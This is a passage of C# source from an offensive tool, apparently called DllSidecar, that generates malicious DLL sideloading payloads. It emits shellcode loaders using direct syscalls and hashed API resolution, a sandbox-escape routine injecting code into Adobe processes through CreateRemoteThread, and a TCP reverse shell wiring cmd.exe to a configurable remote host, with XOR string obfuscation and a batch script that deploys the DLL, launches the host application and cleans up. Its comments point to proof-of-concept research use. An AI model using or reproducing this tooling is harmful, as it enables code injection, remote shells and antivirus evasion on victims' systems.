                 + "    sc_NtAllocateVirtualMemory((HANDLE)-1, &mem, 0, &sz, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);\n"
                 + "    if (!mem) return;\n"
                 + $"    RtlCopyMemory(mem, sc, {scLen});\n"
                 + "    sc_NtProtectVirtualMemory((HANDLE)-1, &mem, &sz, PAGE_EXECUTE_READ, &old);\n"
                 + "    HANDLE hThread = NULL;\n"
                 + "    sc_NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, (HANDLE)-1, mem, NULL, 0, 0, 0, 0, NULL);\n"
                 + "}\n";

        if (config.DInvoke)
            return "static void do_payload(void) {\n"
                 + $"    unsigned char sc[] = {{{scBytes}}};\n"
                 + "    fn_VirtualAlloc pVA = DINVOKE(H_KERNEL32_DLL, H_VIRTUALALLOC, fn_VirtualAlloc);\n"
                 + "    fn_VirtualProtect pVP = DINVOKE(H_KERNEL32_DLL, H_VIRTUALPROTECT, fn_VirtualProtect);\n"
                 + "    fn_CreateThread pCT = DINVOKE(H_KERNEL32_DLL, H_CREATETHREAD, fn_CreateThread);\n"
                 + "    if (!pVA || !pVP || !pCT) return;\n"
                 + $"    LPVOID mem = pVA(NULL, {scLen}, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);\n"
                 + "    if (!mem) return;\n"
                 + $"    RtlCopyMemory(mem, sc, {scLen});\n"
                 + $"    DWORD old; pVP(mem, {scLen}, PAGE_EXECUTE_READ, &old);\n"
                 + "    HANDLE hThread = pCT(NULL, 0, (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);\n"
                 + "    if (hThread) CloseHandle(hThread);\n"
                 + "}\n";

        return "static void do_payload(void) {\n"
             + $"    unsigned char sc[] = {{{scBytes}}};\n"
             + $"    LPVOID mem = VirtualAlloc(NULL, {scLen}, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);\n"
             + "    if (!mem) return;\n"
             + $"    RtlCopyMemory(mem, sc, {scLen});\n"
             + $"    DWORD old; VirtualProtect(mem, {scLen}, PAGE_EXECUTE_READ, &old);\n"
             + "    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);\n"
             + "    if (hThread) CloseHandle(hThread);\n"
             + "}\n";
    }

    /// <summary>
    /// Sandbox-escape payload: enumerate siblings via Toolhelp, inject PIC + ShellData via CreateRemoteThread to CreateProcessA on WinSta0\Default.
    /// PayloadData: comma-separated target EXE names.
    /// </summary>
    private static string GenerateSandboxEscapePayload(TemplateConfig config)
    {
        var targetsCsv = string.IsNullOrWhiteSpace(config.SandboxTargets)
            ? "AcroCEF.exe,AdobeCollabSync.exe"
            : config.SandboxTargets;
        var targetsArr = string.Join(", ",
            targetsCsv.Split(',', StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries)
                      .Select(t => $"\"{t}\""));
        // User cmdline; default cmd+whoami banner; escape backslashes/quotes.
        var sandboxAttr = string.IsNullOrWhiteSpace(config.Researcher) ? "" : $" ({config.Researcher})";
        var rawCmd = string.IsNullOrWhiteSpace(config.PayloadData)
            ? $"cmd.exe /k \"echo DllSidecar sandbox escape{sandboxAttr} & whoami\""
            : config.PayloadData;
        var cmdline = rawCmd.Replace("\\", "\\\\").Replace("\"", "\\\"");
        var proof = config.WriteProofFile ? GenerateProofFileSnippet() : "";

        var sb = new StringBuilder();
        sb.AppendLine("/* Data passed to the remote stub. packed(1) so offsets match across compilers. */");
        sb.AppendLine("#pragma pack(push,1)");
        sb.AppendLine("typedef struct {");
        sb.AppendLine("    UINT_PTR pCreateProcessA;");
        sb.AppendLine("    UINT_PTR pCloseHandle;");
        sb.AppendLine("    char cmdline[512];");
        sb.AppendLine("    char desktop[32];");
        sb.AppendLine("    STARTUPINFOA si;");
        sb.AppendLine("    PROCESS_INFORMATION pi;");
        sb.AppendLine("    DWORD result;");
        sb.AppendLine("    DWORD lastError;");
        sb.AppendLine("} _sc_data_t;");
        sb.AppendLine("#pragma pack(pop)");
        sb.AppendLine();
        sb.AppendLine("/* Runs in the REMOTE process. Position-independent: only struct-field");
        sb.AppendLine("   access + function pointers resolved in the injector side (kernel32");
        sb.AppendLine("   base matches across processes on the same boot). No libc / no IAT. */");
        sb.AppendLine("static DWORD WINAPI _sc_escape(_sc_data_t *d) {");
        sb.AppendLine("    typedef BOOL (WINAPI *CP_t)(LPCSTR,LPSTR,void*,void*,BOOL,DWORD,void*,LPCSTR,LPSTARTUPINFOA,LPPROCESS_INFORMATION);");
        sb.AppendLine("    typedef BOOL (WINAPI *CH_t)(HANDLE);");
        sb.AppendLine("    CP_t fCP = (CP_t)d->pCreateProcessA;");
        sb.AppendLine("    CH_t fCH = (CH_t)d->pCloseHandle;");
        sb.AppendLine("    /* Zero structs without memset — CRT isn't reachable from remote memory. */");
        sb.AppendLine("    char *p = (char*)&d->si;");
        sb.AppendLine("    for (int i = 0; i < (int)sizeof(STARTUPINFOA); i++) p[i] = 0;");
        sb.AppendLine("    p = (char*)&d->pi;");
        sb.AppendLine("    for (int i = 0; i < (int)sizeof(PROCESS_INFORMATION); i++) p[i] = 0;");
        sb.AppendLine("    d->si.cb = sizeof(STARTUPINFOA);");
        sb.AppendLine("    d->si.lpDesktop = d->desktop;");
        sb.AppendLine("    d->si.dwFlags = 1;     /* STARTF_USESHOWWINDOW */");
        sb.AppendLine("    d->si.wShowWindow = 1; /* SW_SHOWNORMAL */");
        sb.AppendLine("    d->result = fCP(0, d->cmdline, 0, 0, 0, 0x10 /*CREATE_NEW_CONSOLE*/,");
        sb.AppendLine("                    0, 0, &d->si, &d->pi);");
        sb.AppendLine("    if (d->result) { fCH(d->pi.hProcess); fCH(d->pi.hThread); }");
        sb.AppendLine("    return d->result;");
        sb.AppendLine("}");
        sb.AppendLine("/* End marker — must follow _sc_escape in source order. With -O0 the compiler");
        sb.AppendLine("   keeps both functions contiguous, so (end - start) yields byte length. */");
        sb.AppendLine("static void _sc_escape_end(void) { }");
        sb.AppendLine();
        sb.AppendLine("static void do_payload(void) {");
        sb.Append(proof);
        sb.AppendLine($"    static const char *targets[] = {{ {targetsArr}, NULL }};");
        sb.AppendLine("    DWORD myPid = GetCurrentProcessId();");
        sb.AppendLine("    HANDLE snap = CreateToolhelp32Snapshot(2 /*TH32CS_SNAPPROCESS*/, 0);");
        sb.AppendLine("    if (snap == INVALID_HANDLE_VALUE) return;");
        sb.AppendLine("    HANDLE hTarget = NULL;");
        sb.AppendLine("    PROCESSENTRY32 pe; pe.dwSize = sizeof(pe);");
        sb.AppendLine("    for (int t = 0; targets[t] && !hTarget; t++) {");
        sb.AppendLine("        if (!Process32First(snap, &pe)) break;");
        sb.AppendLine("        do {");
        sb.AppendLine("            if (pe.th32ProcessID == myPid) continue;");
        sb.AppendLine("            if (lstrcmpiA(pe.szExeFile, targets[t]) != 0) continue;");
        sb.AppendLine("            HANDLE hP = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID);");
        sb.AppendLine("            if (!hP) continue;");
        sb.AppendLine("            void *test = VirtualAllocEx(hP, NULL, 64,");
        sb.AppendLine("                MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);");
        sb.AppendLine("            if (test) {");
        sb.AppendLine("                VirtualFreeEx(hP, test, 0, MEM_RELEASE);");
        sb.AppendLine("                hTarget = hP; break;");
        sb.AppendLine("            }");
        sb.AppendLine("            CloseHandle(hP);");
        sb.AppendLine("        } while (Process32Next(snap, &pe));");
        sb.AppendLine("    }");
        sb.AppendLine("    CloseHandle(snap);");
        sb.AppendLine("    if (!hTarget) return;");
        sb.AppendLine();
        sb.AppendLine("    SIZE_T codeSize = (UINT_PTR)_sc_escape_end - (UINT_PTR)_sc_escape;");
        sb.AppendLine("    if (codeSize > 4096) codeSize = 4096;");
        sb.AppendLine();
        sb.AppendLine("    HMODULE hK32 = GetModuleHandleA(\"kernel32.dll\");");
        sb.AppendLine("    _sc_data_t sd; ZeroMemory(&sd, sizeof(sd));");
        sb.AppendLine("    sd.pCreateProcessA = (UINT_PTR)GetProcAddress(hK32, \"CreateProcessA\");");
        sb.AppendLine("    sd.pCloseHandle    = (UINT_PTR)GetProcAddress(hK32, \"CloseHandle\");");
        sb.AppendLine("    lstrcpyA(sd.desktop, \"WinSta0\\\\Default\");");
        sb.AppendLine($"    lstrcpyA(sd.cmdline, \"{cmdline}\");");
        sb.AppendLine();
        sb.AppendLine("    SIZE_T total = sizeof(_sc_data_t) + codeSize + 64;");
        sb.AppendLine("    void *remoteBase = VirtualAllocEx(hTarget, NULL, total,");
        sb.AppendLine("        MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);");
        sb.AppendLine("    if (!remoteBase) { CloseHandle(hTarget); return; }");
        sb.AppendLine("    void *remoteCode = (char*)remoteBase + sizeof(_sc_data_t);");
        sb.AppendLine("    WriteProcessMemory(hTarget, remoteBase, &sd, sizeof(sd), NULL);");
        sb.AppendLine("    WriteProcessMemory(hTarget, remoteCode, (void*)_sc_escape, codeSize, NULL);");
        sb.AppendLine("    HANDLE hThread = CreateRemoteThread(hTarget, NULL, 0,");
        sb.AppendLine("        (LPTHREAD_START_ROUTINE)remoteCode, remoteBase, 0, NULL);");
        sb.AppendLine("    if (hThread) { WaitForSingleObject(hThread, 10000); CloseHandle(hThread); }");
        sb.AppendLine("    VirtualFreeEx(hTarget, remoteBase, 0, MEM_RELEASE);");
        sb.AppendLine("    CloseHandle(hTarget);");
        sb.AppendLine("}");
        return sb.ToString();
    }

    /// <summary>
    /// TCP reverse-shell payload (WSAStartup/WSASocketW/connect/CreateProcessA cmd.exe wired to socket).
    /// Resolution: DInvoke / EncryptStrings+GetProcAddress / plain. Dotted-quad IPs emit raw bytes; hostnames fall back to inet_addr.
    /// </summary>
    private static string GenerateReverseShellPayload(TemplateConfig config)
    {
        var host = string.IsNullOrWhiteSpace(config.ReverseShellHost) ? "127.0.0.1" : config.ReverseShellHost.Trim();
        var port = config.ReverseShellPort > 0 && config.ReverseShellPort < 65536
            ? config.ReverseShellPort : 4444;

        // Dotted-quad emits raw bytes; otherwise fall back to runtime inet_addr.
        bool literalIp = System.Net.IPAddress.TryParse(host, out var ipAddr)
            && ipAddr.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork;
        string sinAddrInit;
        if (literalIp)
        {
            var b = ipAddr!.GetAddressBytes();   // already network-order for IPv4
            // Pack s_addr little-endian so bytes match wire order.
            uint packed = (uint)b[0] | ((uint)b[1] << 8) | ((uint)b[2] << 16) | ((uint)b[3] << 24);
            sinAddrInit = $"sa.sin_addr.s_addr = 0x{packed:X8}UL; /* {host} */";
        }
        else
        {
            // Hostname or non-trivial IP — runtime inet_addr; escape for the literal.
            var escapedHost = CEscapeForLiteral(host);
            sinAddrInit = $"sa.sin_addr.s_addr = inet_addr(\"{escapedHost}\"); /* runtime resolve */";
        }

        // Network-order port: byte-swap host→network at template time.
        ushort nport = (ushort)(((port & 0xFF) << 8) | ((port >> 8) & 0xFF));

        var sb = new StringBuilder();
        var traceEnabled = config.WriteProofFile;
        var displayTarget = $"{host}:{port}";

        // Inline trace helpers. They emit small fopen/fprintf/fclose blocks that
        // Reopen the proof file in append mode at each milestone.
        void TraceStep(string label)
        {
            if (!traceEnabled) return;
            sb.AppendLine($"    {{ FILE *_t = fopen(_proof_path, \"a\"); if (_t) {{ fprintf(_t, \"[step] {label}\\n\"); fclose(_t); }} }}");
        }
        void TraceOk(string label)
        {
            if (!traceEnabled) return;
            sb.AppendLine($"    {{ FILE *_t = fopen(_proof_path, \"a\"); if (_t) {{ fprintf(_t, \"[ ok ] {label}\\n\"); fclose(_t); }} }}");
        }
        void TraceFail(string label, string errExpr, string indent = "    ")
        {
            if (!traceEnabled) return;
            sb.AppendLine($"{indent}{{ int _err = {errExpr}; FILE *_t = fopen(_proof_path, \"a\"); if (_t) {{ fprintf(_t, \"[fail] {label} (last_error=%d)\\n\", _err); fclose(_t); }} }}");
        }

        sb.AppendLine("static void do_payload(void) {");

        // Function-scope proof path; header in "w", traces in "a".
        // are emitted — produces the same lean binary as before.
        if (traceEnabled)
        {
            sb.AppendLine("    char _proof_path[MAX_PATH], _proof_temp[MAX_PATH];");
            sb.AppendLine("    GetTempPathA(MAX_PATH, _proof_temp);");
            sb.AppendLine("    wsprintfA(_proof_path, \"%sdllsidecar_proof_%lu.txt\", _proof_temp, GetCurrentProcessId());");
            sb.AppendLine("    { FILE *_f = fopen(_proof_path, \"w\");");
            sb.AppendLine("      if (_f) {");
            sb.AppendLine("          SYSTEMTIME _st; GetLocalTime(&_st);");
            sb.AppendLine("          fprintf(_f, \"DllSidecar PoC — payload fired\\n\"");
            sb.AppendLine("                      \"PID: %lu\\n\"");
            sb.AppendLine("                      \"Timestamp: %04d-%02d-%02d %02d:%02d:%02d\\n\"");
            sb.AppendLine($"                      \"Mode: Reverse Shell -> {displayTarget}\\n\\n\",");
            sb.AppendLine("              GetCurrentProcessId(), _st.wYear, _st.wMonth, _st.wDay,");
            sb.AppendLine("              _st.wHour, _st.wMinute, _st.wSecond);");
            sb.AppendLine("          fclose(_f);");
            sb.AppendLine("      } }");
        }

        // API resolution: DInvoke uses dinvoke.h H_*/fn_* macros (WS2_32 typedefs gated behind _WINSOCK2API_).
        // #include <winsock2.h> at file top already triggers — so fn_WSAStartup
        // and friends are visible here without any extra ceremony.
        if (config.DInvoke)
        {
            sb.AppendLine("    fn_WSAStartup    pStartup = DINVOKE(H_WS2_32_DLL,  H_WSASTARTUP,    fn_WSAStartup);");
            sb.AppendLine("    fn_WSASocketW    pSocket  = DINVOKE(H_WS2_32_DLL,  H_WSASOCKETW,    fn_WSASocketW);");
            sb.AppendLine("    fn_connect       pConnect = DINVOKE(H_WS2_32_DLL,  H_CONNECT,       fn_connect);");
            sb.AppendLine("    fn_closesocket   pClose   = DINVOKE(H_WS2_32_DLL,  H_CLOSESOCKET,   fn_closesocket);");
            sb.AppendLine("    fn_CreateProcessA pCP     = DINVOKE(H_KERNEL32_DLL, H_CREATEPROCESSA, fn_CreateProcessA);");
            // DINVOKE() walks PEB so force-LoadLibrary ws2_32 first if not already loaded.
            sb.AppendLine("    if (!pStartup) {");
            sb.AppendLine("        LoadLibraryA(\"ws2_32.dll\");");
            sb.AppendLine("        pStartup = DINVOKE(H_WS2_32_DLL, H_WSASTARTUP,  fn_WSAStartup);");
            sb.AppendLine("        pSocket  = DINVOKE(H_WS2_32_DLL, H_WSASOCKETW,  fn_WSASocketW);");
            sb.AppendLine("        pConnect = DINVOKE(H_WS2_32_DLL, H_CONNECT,     fn_connect);");
            sb.AppendLine("        pClose   = DINVOKE(H_WS2_32_DLL, H_CLOSESOCKET, fn_closesocket);");
            sb.AppendLine("    }");
            sb.AppendLine("    if (!pStartup || !pSocket || !pConnect || !pClose || !pCP) return;");
        }
        else if (config.EncryptStrings)
        {
            // Non-DInvoke + XOR: encrypt the resolution strings so the binary
            // doesn't reveal "ws2_32.dll" / "WSAStartup" in plain strings.
            sb.Append(GenerateEncryptedString("ws2_32.dll", "ws2_name", config.LongXorKey));
            sb.Append(GenerateEncryptedString("WSAStartup", "n_start", config.LongXorKey));
            sb.Append(GenerateEncryptedString("WSASocketW", "n_sock",  config.LongXorKey));
            sb.Append(GenerateEncryptedString("connect",    "n_conn",  config.LongXorKey));
            sb.Append(GenerateEncryptedString("closesocket","n_close", config.LongXorKey));
            sb.Append(GenerateEncryptedString("CreateProcessA","n_cp", config.LongXorKey));
            sb.AppendLine("    HMODULE hWs2 = LoadLibraryA(ws2_name);");
            sb.AppendLine("    if (!hWs2) return;");
            sb.AppendLine("    fn_WSAStartup     pStartup = (fn_WSAStartup)    GetProcAddress(hWs2, n_start);");
            sb.AppendLine("    fn_WSASocketW     pSocket  = (fn_WSASocketW)    GetProcAddress(hWs2, n_sock);");
            sb.AppendLine("    fn_connect        pConnect = (fn_connect)       GetProcAddress(hWs2, n_conn);");
            sb.AppendLine("    fn_closesocket    pClose   = (fn_closesocket)   GetProcAddress(hWs2, n_close);");
            sb.AppendLine("    HMODULE hK32 = GetModuleHandleA(\"kernel32.dll\");");
            sb.AppendLine("    fn_CreateProcessA pCP      = (fn_CreateProcessA)GetProcAddress(hK32, n_cp);");
            sb.AppendLine("    if (!pStartup || !pSocket || !pConnect || !pClose || !pCP) return;");
        }
        else
        {
            // Plain path: LoadLibraryA + GetProcAddress by name. Easiest to
            // read in a write-up advisory — strings are in the binary.
            sb.AppendLine("    HMODULE hWs2 = LoadLibraryA(\"ws2_32.dll\");");
            sb.AppendLine("    if (!hWs2) return;");
            sb.AppendLine("    fn_WSAStartup     pStartup = (fn_WSAStartup)    GetProcAddress(hWs2, \"WSAStartup\");");
            sb.AppendLine("    fn_WSASocketW     pSocket  = (fn_WSASocketW)    GetProcAddress(hWs2, \"WSASocketW\");");
            sb.AppendLine("    fn_connect        pConnect = (fn_connect)       GetProcAddress(hWs2, \"connect\");");
            sb.AppendLine("    fn_closesocket    pClose   = (fn_closesocket)   GetProcAddress(hWs2, \"closesocket\");");
            sb.AppendLine("    HMODULE hK32 = GetModuleHandleA(\"kernel32.dll\");");
            sb.AppendLine("    fn_CreateProcessA pCP      = (fn_CreateProcessA)GetProcAddress(hK32, \"CreateProcessA\");");
            sb.AppendLine("    if (!pStartup || !pSocket || !pConnect || !pClose || !pCP) return;");
        }

        // ── WSA init + socket + connect ──
        TraceStep("WSAStartup");
        sb.AppendLine("    WSADATA wsa;");
        sb.AppendLine("    if (pStartup(MAKEWORD(2,2), &wsa) != 0) {");
        TraceFail("WSAStartup", "WSAGetLastError()", "        ");
        sb.AppendLine("        return;");
        sb.AppendLine("    }");
        TraceOk("WSAStartup");

        // WSA_FLAG_OVERLAPPED = 0x01 — required for STARTF_USESTDHANDLES inheritance
        // to work cleanly on the child process. dwFlags=0 silently drops events.
        TraceStep("WSASocketW");
        sb.AppendLine("    SOCKET s = pSocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);");
        sb.AppendLine("    if (s == INVALID_SOCKET) {");
        TraceFail("WSASocketW", "WSAGetLastError()", "        ");
        sb.AppendLine("        return;");
        sb.AppendLine("    }");
        TraceOk("WSASocketW");

        sb.AppendLine("    struct sockaddr_in sa;");
        sb.AppendLine("    ZeroMemory(&sa, sizeof(sa));");
        sb.AppendLine("    sa.sin_family = AF_INET;");
        sb.AppendLine($"    sa.sin_port = 0x{nport:X4};   /* htons({port}) = 0x{nport:X4} */");
        sb.AppendLine($"    {sinAddrInit}");

        TraceStep($"connect -> {displayTarget}");
        sb.AppendLine("    if (pConnect(s, (struct sockaddr*)&sa, sizeof(sa)) == SOCKET_ERROR) {");
        TraceFail("connect", "WSAGetLastError()", "        ");
        sb.AppendLine("        pClose(s); return;");
        sb.AppendLine("    }");
        TraceOk("connect");

        // Spawn cmd.exe with stdio wired to the socket; XOR-encrypted cmdline if EncryptStrings.
        if (config.EncryptStrings)
            sb.Append(GenerateEncryptedString("cmd.exe", "shell", config.LongXorKey));
        else
            sb.AppendLine("    CHAR shell[] = \"cmd.exe\";");
        sb.AppendLine("    STARTUPINFOA si; ZeroMemory(&si, sizeof(si));");
        sb.AppendLine("    si.cb = sizeof(si);");
        sb.AppendLine("    si.dwFlags = STARTF_USESTDHANDLES;");
        sb.AppendLine("    si.hStdInput  = (HANDLE)s;");
        sb.AppendLine("    si.hStdOutput = (HANDLE)s;");
        sb.AppendLine("    si.hStdError  = (HANDLE)s;");
        sb.AppendLine("    PROCESS_INFORMATION pi; ZeroMemory(&pi, sizeof(pi));");

        TraceStep("CreateProcessA cmd.exe (stdin/out/err -> socket)");
        // CREATE_NO_WINDOW (0x08000000): suppress the cmd.exe console window in GUI hosts.
        sb.AppendLine("    if (!pCP(NULL, shell, NULL, NULL, TRUE, 0x08000000, NULL, NULL, &si, &pi)) {");
        TraceFail("CreateProcessA", "GetLastError()", "        ");
        sb.AppendLine("        pClose(s); return;");
        sb.AppendLine("    }");
        TraceOk("CreateProcessA");

        sb.AppendLine("    if (pi.hProcess) CloseHandle(pi.hProcess);");
        sb.AppendLine("    if (pi.hThread)  CloseHandle(pi.hThread);");
        sb.AppendLine("}");

        return sb.ToString();
    }

    // Dispatch statement for payload_execute() (wrapped by file-scope once-guard).
    private static string GeneratePayloadInvoke(TemplateConfig config)
    {
        var sb = new StringBuilder();
        switch (config.Thread)
        {
            case ThreadMode.Calling:
                sb.AppendLine("    do_payload();");
                break;
            case ThreadMode.Std:
                sb.AppendLine("    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)do_payload, NULL, 0, NULL);");
                break;
            case ThreadMode.Native:
                if (config.AnySyscalls)
                {
                    sb.AppendLine("    HANDLE hThread = NULL;");
                    sb.AppendLine("    sc_NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL,");
                    sb.AppendLine("        (HANDLE)-1, (PVOID)do_payload, NULL, 0, 0, 0, 0, NULL);");
                }
                else
                    sb.AppendLine("    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)do_payload, NULL, 0, NULL);");
                break;
        }
        return sb.ToString();
    }

    private static string GenerateDefFile(PeAnalysis analysis, List<ExportEntry> exports, bool useTrampolines)
    {
        var sb = new StringBuilder();
        // No LIBRARY directive (see GenerateForwarderDefFile for the keyword-collision rationale).
        sb.AppendLine("EXPORTS");

        for (int i = 0; i < exports.Count; i++)
        {
            var label = $"tramp_{SafeLabel(exports[i].DisplayName)}";
            if (exports[i].Name != null)
                sb.AppendLine($"    {exports[i].Name} = {label} @{exports[i].Ordinal}");
            else
                sb.AppendLine($"    ord_{exports[i].Ordinal} = {label} @{exports[i].Ordinal} NONAME");
        }

        return sb.ToString();
    }

    private static string GenerateBuildBat(PeAnalysis analysis, TemplateConfig config, string srcName, string mode)
    {
        bool isX64 = analysis.Arch == "x64";
        var gccPrefix = isX64 ? "x86_64-w64-mingw32" : "i686-w64-mingw32";
        var mingwPath = isX64 ? @"C:\msys64\mingw64\bin" : @"C:\msys64\mingw32\bin";
        // `-I.` since headers are copied alongside the generated .c/.def.
        var needsHeaders = config.DInvoke || config.EncryptStrings || config.AnySyscalls || config.UnhookNtdll || config.PatchEtw;
        var incFlag = needsHeaders ? "-I." : "";

        var sb = new StringBuilder();
        sb.Append("@echo off\r\nsetlocal\r\n");
        sb.Append($"set \"PATH={mingwPath};%PATH%\"\r\n\r\n");
        sb.Append($"echo === DllSidecar {mode} Build ===\r\n");
        sb.Append($"echo Target: {analysis.Filename} ({analysis.Arch})\r\n\r\n");
        // Minimal flags: -O0, dynamic msvcrt, -ladvapi32 for token/SID APIs.
        var parts = new List<string> { $"{gccPrefix}-gcc", "-shared", "-O0",
            "-o", analysis.Filename, $"{srcName}.c", $"{srcName}.def" };
        if (!string.IsNullOrEmpty(incFlag)) parts.Add(incFlag);
        parts.Add("-ladvapi32");
        // ReverseShell needs ws2_32; gate so other payloads stay minimal.
        if (config.Payload == PayloadType.ReverseShell) parts.Add("-lws2_32");
        // -Wl,--kill-at strips the stdcall "@N" suffix from stub_ord_N exports so MinGW's
        // linker stops warning about resolving "foo by linking to foo@0". No runtime effect.
        parts.Add("-Wl,--kill-at");
        sb.Append(string.Join(" ", parts) + "\r\n");
        sb.Append("if errorlevel 1 (\r\n");
        sb.Append("    echo [!] Compilation failed\r\n");
        sb.Append("    exit /b 1\r\n)\r\n\r\n");
        sb.Append($"echo [+] Built: {analysis.Filename} ({analysis.Arch})\r\n");

        // Deploy + Run + Restore tail when caller supplied a phantom slot.
        if (!string.IsNullOrEmpty(config.DeployTargetDir) && !string.IsNullOrEmpty(config.HostExePath))
        {
            var deployName = string.IsNullOrEmpty(config.DeployTargetName)
                ? analysis.Filename : config.DeployTargetName;
            var deployPath = Path.Combine(config.DeployTargetDir, deployName);
            var hostBaseName = Path.GetFileName(config.HostExePath);

            // Proxy mode with a known system original: drop both the proxy and
            // the renamed original so the forward chain (X_orig.Foo) resolves.
            var needsOrig = config.Mode == GenerationMode.Proxy
                && !string.IsNullOrEmpty(config.SystemOrigPath);
            var origName = Path.GetFileNameWithoutExtension(analysis.Filename) + "_orig.dll";
            var origDeployPath = Path.Combine(config.DeployTargetDir, origName);

            sb.Append("\r\n");
            sb.Append("echo.\r\n");
            sb.Append("echo === DEPLOY ===\r\n");
            // Use %DEPLOY_DIR%: literal "(x86)" breaks cmd.exe paren parser.
            sb.Append($"set \"DEPLOY_DIR={config.DeployTargetDir}\"\r\n");
            sb.Append($"set \"DEPLOY_PATH={deployPath}\"\r\n");
            sb.Append($"set \"HOST_EXE={config.HostExePath}\"\r\n");
            if (needsOrig)
            {
                sb.Append($"set \"ORIG_PATH={origDeployPath}\"\r\n");
                sb.Append($"set \"ORIG_SOURCE={config.SystemOrigPath}\"\r\n");
            }
            // mkdir defensively — first run on fresh machine may not have the dir yet.
            sb.Append("if not exist \"%DEPLOY_DIR%\" mkdir \"%DEPLOY_DIR%\" >nul 2>&1\r\n");
            // Probe writability and fail fast.
            sb.Append("echo probe>\"%DEPLOY_DIR%\\.dllsidecar_probe\" 2>nul\r\n");
            sb.Append("if errorlevel 1 (\r\n");
            sb.Append("    echo [!] Cannot write to \"%DEPLOY_DIR%\"\r\n");
            sb.Append("    echo     Check NTFS ACL / AV real-time protection / UAC virtualization\r\n");
            sb.Append("    exit /b 5\r\n");
            sb.Append(")\r\n");
            sb.Append("del \"%DEPLOY_DIR%\\.dllsidecar_probe\" >nul 2>&1\r\n");
            sb.Append($"echo [*] Copying {analysis.Filename} -^> %DEPLOY_PATH%\r\n");
            sb.Append($"copy /Y \"{analysis.Filename}\" \"%DEPLOY_PATH%\" >nul\r\n");
            sb.Append("if errorlevel 1 (\r\n");
            sb.Append("    echo [!] Deploy failed -- writable directory? UAC blocking?\r\n");
            sb.Append("    exit /b 2\r\n");
            sb.Append(")\r\n");
            sb.Append("echo [+] Deployed\r\n");
            if (needsOrig)
            {
                sb.Append($"echo [*] Copying system original {config.SystemOrigPath} -^> %ORIG_PATH%\r\n");
                sb.Append("copy /Y \"%ORIG_SOURCE%\" \"%ORIG_PATH%\" >nul\r\n");
                sb.Append("if errorlevel 1 (\r\n");
                sb.Append("    echo [!] Could not copy system original -- proxy forwards will fail.\r\n");
                sb.Append("    del \"%DEPLOY_PATH%\" >nul 2>&1\r\n");
                sb.Append("    exit /b 4\r\n");
                sb.Append(")\r\n");
                sb.Append("echo [+] Original side-copied as _orig\r\n");
            }
            sb.Append("\r\n");

            sb.Append("if not exist \"%HOST_EXE%\" (\r\n");
            sb.Append("    echo [!] Host EXE not found: \"%HOST_EXE%\"\r\n");
            sb.Append("    del \"%DEPLOY_PATH%\" >nul 2>&1\r\n");
            sb.Append("    exit /b 3\r\n");
            sb.Append(")\r\n");
            // Launch host with CWD = install dir (many apps resolve assets via CWD).
            sb.Append("for %%I in (\"%HOST_EXE%\") do set \"HOST_DIR=%%~dpI\"\r\n\r\n");

            sb.Append("echo === RUN ===\r\n");
            if (config.PreLaunchDelaySec > 0)
            {
                sb.Append($"echo [*] Waiting {config.PreLaunchDelaySec}s before launch (PreLaunchDelay)...\r\n");
                sb.Append($"timeout /t {config.PreLaunchDelaySec} /nobreak >nul\r\n");
            }
            sb.Append("echo [*] Launching host: %HOST_EXE%\r\n");
            if (config.WaitForHostExit)
            {
                sb.Append("echo [i] Close the host window when done -- script will then restore.\r\n");
                sb.Append("start \"\" /D \"%HOST_DIR%\" /WAIT \"%HOST_EXE%\"\r\n\r\n");
                // Pause: trampoline launchers exit before the child loads our DLL.
                sb.Append("echo.\r\n");
                sb.Append("echo [i] Host process returned. If the target is a launcher/trampoline,\r\n");
                sb.Append("echo [i] the real child may still be running. Verify the payload fired,\r\n");
                sb.Append("echo [i] then press a key to clean up the deployed DLL.\r\n");
                sb.Append("pause\r\n\r\n");
            }
            else
            {
                // Fire-and-forget: start the host non-blocking, wait N seconds,
                // then dump proof file (if written by payload) and proceed to cleanup.
                sb.Append($"echo [i] Fire-and-forget mode -- will wait {config.NonBlockingTimeoutSec}s then inspect proof file.\r\n");
                sb.Append("start \"\" /D \"%HOST_DIR%\" \"%HOST_EXE%\"\r\n");
                sb.Append($"timeout /t {config.NonBlockingTimeoutSec} /nobreak >nul\r\n");
                sb.Append("echo.\r\n");
                sb.Append("echo === PROOF ===\r\n");
                // Scan %TEMP% for the newest dllsidecar_proof_*.txt.
                sb.Append("for /f \"delims=\" %%F in ('dir /b /o-d \"%TEMP%\\dllsidecar_proof_*.txt\" 2^>nul') do (\r\n");
                sb.Append("    echo [+] Proof file: %TEMP%\\%%F\r\n");
                sb.Append("    type \"%TEMP%\\%%F\"\r\n");
                sb.Append("    goto :proof_shown\r\n");
                sb.Append(")\r\n");
                sb.Append("echo [-] No proof file found. Payload may not have fired, or WriteProofFile was off.\r\n");
                sb.Append(":proof_shown\r\n\r\n");
            }

            sb.Append("echo === RESTORE ===\r\n");
            sb.Append("echo [*] Removing deployed DLL: %DEPLOY_PATH%\r\n");
            sb.Append("del \"%DEPLOY_PATH%\" >nul 2>&1\r\n");
            sb.Append("if exist \"%DEPLOY_PATH%\" (\r\n");
            sb.Append("    echo [!] Could not delete -- still loaded? Try after host fully exits.\r\n");
            sb.Append(") else (\r\n");
            sb.Append("    echo [+] Cleaned\r\n");
            sb.Append(")\r\n");
            if (needsOrig)
            {
                sb.Append("echo [*] Removing side-copied original: %ORIG_PATH%\r\n");
                sb.Append("del \"%ORIG_PATH%\" >nul 2>&1\r\n");
            }
            sb.Append($"echo [*] Killing any lingering '{hostBaseName}' processes...\r\n");
            sb.Append($"taskkill /F /T /IM \"{hostBaseName}\" >nul 2>&1\r\n");
        }

        sb.Append("\r\n");
        sb.Append("echo.\r\n");
